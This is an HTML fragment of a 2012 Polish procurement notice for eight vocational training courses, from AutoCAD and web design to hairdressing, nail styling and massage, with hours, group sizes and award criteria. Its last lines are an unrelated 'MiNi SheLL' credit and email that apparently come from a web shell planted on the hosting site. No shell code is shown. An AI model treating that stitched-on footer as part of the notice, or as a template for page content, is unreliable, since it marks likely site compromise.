<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Doświadczenie wykonawcy - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs obsługi programu Auto-CAD.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs obsługi programu Auto-CAD (60 godzin przy czym 1 godz. = 45 min zajęć i 15 min. przerwy, długość przerw może być ustalona w sposób elastyczny) dla 2 osób. Zamawiający zastrzega sobie możliwość zmiany liczby uczestników/uczestniczek zgodnie z dopuszczalnymi zmianami umowy. Kurs powinien odbywać się w systemie dziennym. Zamawiający zastrzega sobie możliwość zmiany systemu w zależności od aktualnych potrzeb uczestników/uczestniczek projektu (po uzgodnieniu z Wykonawcą). Osoby biorące udział w kursie/szkoleniu nie miały 
do tej pory styczności z pracą w tym charakterze a wiążą z nią swój dalszy rozwój zawodowy. 
Osoby biorące udział w kursie/szkoleniu posiadają podstawową lub na poziomie średnim wiedzę 
z zakresu obsługi komputera.
Kurs powinien obejmować trzy stopnie zaawansowania, po każdym z nich wydawane powinny być certyfikaty ukończenia. 
Program szkolenia obejmuje zagadnienia z zakresu podstaw i zaawansowanej obsługi programu graficznego AUTOCAD (III stopnie), przygotowuje do samodzielnego wykonywania dokumentacji z wykorzystaniem programu. 
Program powinien obejmować m.in.: wprowadzenie do środowiska pracy, wyświetlania rysunku, ustawienia rysunku, tworzenie geometrii dwuwymiarowej, techniki konstrukcyjne, wprowadzenie do wymiarowania, kreskowanie, bloki, obrazy rastowe, wymiarowanie w przestrzeni modelu 
i papieru, wprowadzenie do przestrzeni trójwymiarowej, system współrzędnych 3D, modele bryłowe, wprowadzenie do wizualizacji. 
Program kursu Wykonawca przedkłada wraz z ofertą w zał nr 11. Program szkolenia musi być opracowany zgodnie z Rozporządzeniem MEN z dnia 3 lutego 2006 r. w sprawie uzyskiwania 
i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych 
w formach pozaszkolnych (Dz. U. Nr 31 poz. 216 z późn. zm.). 
Wykonawca winien zapewnić każdemu uczestnikowi szkolenia osobny komputer z odpowiednim oprogramowaniem.
Kurs kończy się egzaminem (Egzamin nie jest wliczony w liczbę godzin kursu) oraz wydaniem zaświadczeń o ukończeniu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Doświadczenie wykonawcy - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs komputerowy z zakresu tworzenia stron internetowych z elementami programów graficznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs komputerowy z zakresu tworzenia stron internetowych z elementami programów graficznych (60 godzin- przy czym 1 godz.= 45 min zajęć i 15 min. przerwy, długość przerw może być ustalona w sposób elastyczny) dla 2 osób. Zamawiający zastrzega sobie możliwość zmiany liczby uczestników/uczestniczek zgodnie z dopuszczalnymi zmianami umowy. Kurs powinien odbywać się w systemie dziennym/popołudniowym. Zamawiający zastrzega sobie możliwość zmiany systemu w zależności od aktualnych potrzeb uczestników/uczestniczek projektu (po uzgodnieniu z Wykonawcą).
Osoby biorące udział w kursie/szkoleniu posiadająca na poziomie średnim wiedzę z zakresu obsługi komputera. 
Minimalny zakres tematyczny kursu:
- podstawy języka HTML i tworzenie strony www;
- listy, znaki specjalne, wskaźniki i odnośniki;
- wewnętrzne odwołania w tworzonym dokumencie;
- wstawianie grafiki do dokumentu;
- tabele i ramki na stronach www;
- tła, rolety, znaki wodne, dźwięk na stronach www;
- zasady tworzenia formularzy HTML;
- ćwiczenia z pocztą elektroniczną - zakładanie skrzynki e-mail;
- konfiguracja Outlook Express;
- zasady publikowania swojego serwisu informacyjnego na serwerze Internetowym;
- tworzenie stron www  z wykorzystaniem wybranych aplikacji;
Program kursu Wykonawca przedkłada wraz z ofertą z zał nr 11. Program szkolenia musi być opracowany zgodnie z Rozporządzeniem MEN z dnia 3 lutego 2006 r. w sprawie uzyskiwania 
i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych 
w formach pozaszkolnych (Dz. U. Nr 31 poz. 216 z późn. zm.). 
Każda osoba powinna mieć zapewnione do dyspozycji własne stanowisko komputerowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Doświadczenie wykonawcy - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Kurs komputerowy z zakresu obsługi programów Microsoft Office.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs komputerowy z zakresu obsługi programów Microsoft Office (40 godzin- przy czym 1 godz.= 45 min zajęć i 15 min. przerwy, długość przerw może być ustalona w sposób elastyczny) dla 20 osób. Zamawiający zastrzega sobie możliwość zmiany liczby uczestników/uczestniczek zgodnie z dopuszczalnymi zmianami umowy. Kurs powinien odbywać się w systemie popołudniowym bądź weekendowym. Zamawiający zastrzega sobie możliwość zmiany systemu 
w zależności od aktualnych potrzeb uczestników/uczestniczek projektu (po uzgodnieniu 
z Wykonawcą). Osoby biorące udział w kursie/szkoleniu mają podstawową wiedzę na temat obsługi/pracy przy komputerze. 
Minimalny zakres tematyczny kursu:
- obsługa programów biurowych Microsoft Office, w szczególności MS Word, MS Excel i Power Point, MS Outlook Express
- tworzenie plików PDF;
- obsługa urządzeń biurowych typu drukarka, skaner, kopiarka.
Program kursu Wykonawca przedkłada wraz z ofertą w zał nr 11. Program szkolenia musi być opracowany zgodnie z Rozporządzeniem MEN z dnia 3 lutego 2006 r. w sprawie uzyskiwania 
i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych 
w formach pozaszkolnych (Dz. U. Nr 31 poz. 216 z późn. zm.). 
Każda osoba powinna mieć zapewnione do dyspozycji własne stanowisko komputerowe. 
Program szkolenia musi być opracowany zgodnie z Rozporządzeniem MEN z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności 
i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31 poz. 216 z późn. zm.). 
Kurs kończy się egzaminem (Egzamin nie jest wliczony w liczbę godzin kursu) oraz wydaniem zaświadczeń o ukończeniu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Doświadczenie wykonawcy - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kurs Obsługa kasy fiskalnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs Obsługa kasy fiskalnej (30 godzin przy czym 1 godz. = 45 min zajęć i 15 min. przerwy, długość przerw może być ustalona w sposób elastyczny) dla 15 osób. Zamawiający zastrzega sobie możliwość zmiany liczby uczestników/uczestniczek zgodnie z dopuszczalnymi zmianami umowy. Kurs powinien odbywać się w systemie wieczorowym bądź weekendowym. Zamawiający zastrzega sobie możliwość zmiany systemu w zależności od aktualnych potrzeb uczestników/uczestniczek projektu (po uzgodnieniu z Wykonawcą).
Osoby biorące udział w kursie/szkoleniu nie miały do tej pory styczności z obsługą kasy fiskalnej. Program kursu musi obejmować następujące zagadnienia: 
podstawowe akty prawne dotyczące kasy fiskalnej, 
organizacja pracy kasjera, 
odpowiedzialność materialna, 
kody kreskowe, 
podatek od wartości dodanej, 
nauka fakturowania, 
ćwiczenia praktyczne na kasie fiskalnej. 
Kurs kończy się egzaminem wewnętrznym oraz wydaniem stosownego zaświadczenia 
o ukończeniu kursu obsługi kas fiskalnych zgodnie ze wzorem MEN.
Program kursu Wykonawca przedkłada wraz z ofertą z zał nr 11. Program szkolenia musi być opracowany zgodnie z Rozporządzeniem MEN z dnia 3 lutego 2006 r. w sprawie uzyskiwania 
i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych 
w formach pozaszkolnych (Dz. U. Nr 31 poz. 216 z późn. zm.). 
Kurs kończy się egzaminem (Egzamin nie jest wliczony w liczbę godzin kursu) oraz wydaniem zaświadczeń o ukończeniu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Doświadczenie wykonawcy - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Kurs fryzjerstwa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs fryzjerstwa (120 godzin przy czym 1 godz. = 45 min zajęć i 15 min. przerwy, długość przerw może być ustalona w sposób elastyczny) dla 4 osób. Kurs powinien być przeprowadzony w systemie weekendowym bądź popołudniowym. Zamawiający zastrzega sobie możliwość zmiany liczby uczestników/uczestniczek zgodnie z dopuszczalnymi zmianami umowy. Zamawiający zastrzega sobie możliwość zmiany systemu w zależności od aktualnych potrzeb uczestników/uczestniczek projektu (po uzgodnieniu z Wykonawcą).
Kurs powinien zostać przeprowadzony w oparciu o program zgodny z Rozporządzeniem MENiS 
z dnia 3 lutego 2006 r. w  sprawie uzyskiwania i uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r.,
 nr 31, poz. 216). Ponadto przy opracowaniu programu należy wykorzystać Standardy Kwalifikacji Zawodowych opracowanych dla zawodu fryzjer, dostępne w Bazach danych Ministra Pracy i Polityki Społecznej. Program powinien zostać podzielony na część teoretyczną 
i praktyczną. 
Każda uczestnik/uczestnika kursu musi mieć zapewnioną odzież ochronną w zależności 
od rodzaju ćwiczeń oraz zestaw podstawowych narzędzi fryzjerskich do wykonywania ćwiczeń 
w postaci co najmniej: główki fryzjerskiej, narzędzi fryzjerskich (nożyczki, grzebienie, szczotki, suszarki), zestaw środków do pielęgnacji włosów, zestaw środków do stylizacji włosów, zestaw do farbowania włosów (m.in. farby, miseczki plastikowe do rozrabiania farb, pędzelki 
do nakładania farb itp.), inne środki i urządzenia niezbędne do wykonywania na włosach ćwiczeń, która przewidziane są w programie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Doświadczenie wykonawcy - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Kurs Kosmetyka z elementami wizażu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs Kosmetyka z elementami wizażu (60 godzin przy czym 1 godz. = 45 min zajęć i 15 min. przerwy, długość przerw może być ustalona w sposób elastyczny) dla 8 osób. Kurs powinien być przeprowadzony w systemie weekendowym bądź popołudniowym. Zamawiający zastrzega sobie możliwość zmiany liczby uczestników/uczestniczek zgodnie z dopuszczalnymi zmianami umowy. Zamawiający zastrzega sobie możliwość zmiany systemu w zależności od aktualnych potrzeb uczestników/uczestniczek projektu (po uzgodnieniu z Wykonawcą).
Program szkolenia powinien być zgodny z aktualnymi standardami kwalifikacji i umiejętności zawodowych. Uczestnikami/uczestniczkami kursu będą osoby nie posiadające doświadczenia 
w pracy jako kosmetyczka.
Każda uczestnik/uczestnika kursu musi mieć zapewnioną odzież ochronną w zależności 
od rodzaju ćwiczeń oraz zestaw podstawowych narzędzi i kosmetyków niezbędnych 
do wykonywania ćwiczeń..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Doświadczenie wykonawcy - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Kurs Stylizacji paznokci.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs Stylizacji paznokci (40 godzin przy czym 1 godz. = 45 min zajęć i 15 min. przerwy, długość przerw może być ustalona w sposób elastyczny) dla 6 osób. Kurs powinien być przeprowadzony w systemie weekendowym bądź popołudniowym. Zamawiający zastrzega sobie możliwość zmiany liczby uczestników/uczestniczek zgodnie z dopuszczalnymi zmianami umowy. Zamawiający zastrzega sobie możliwość zmiany systemu w zależności od aktualnych potrzeb uczestników/uczestniczek projektu (po uzgodnieniu z Wykonawcą).
Kurs powinien być skierowany do osób, które dopiero rozpoczynają swoja drogę w  kierunku pracy w zawodzie stylisty paznokci. Program powinien obejmować manicure, pedicure, przedłużanie paznokci oraz wzornictwo lakierowe i aplikacje ozdób.  
Każda uczestnik/uczestnika kursu musi mieć zapewniony zestaw podstawowych narzędzi 
i kosmetyków niezbędnych do wykonywania ćwiczeń..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Doświadczenie wykonawcy - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Kurs Masażu I stopnia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs Masażu I stopnia (80 godzin przy czym 1 godz. = 45 min zajęć i 15 min. przerwy, długość przerw może być ustalona w sposób elastyczny) dla 1 osoby. Kurs powinien być przeprowadzony w systemie weekendowym bądź popołudniowym. Zamawiający zastrzega sobie możliwość zmiany liczby uczestników/uczestniczek zgodnie z dopuszczalnymi zmianami umowy. Zamawiający zastrzega sobie możliwość zmiany systemu w zależności od aktualnych potrzeb uczestników/uczestniczek projektu (po uzgodnieniu z Wykonawcą).
Kurs powinien być skierowany do osób, które dopiero rozpoczynają swoja drogę w kierunku pracy w zawodzie. Program powinien obejmować anatomię i fizjologię człowieka, teorię 
i praktykę masażu klasycznego, wskazania i przeciwwskazania do masażu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Doświadczenie wykonawcy - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com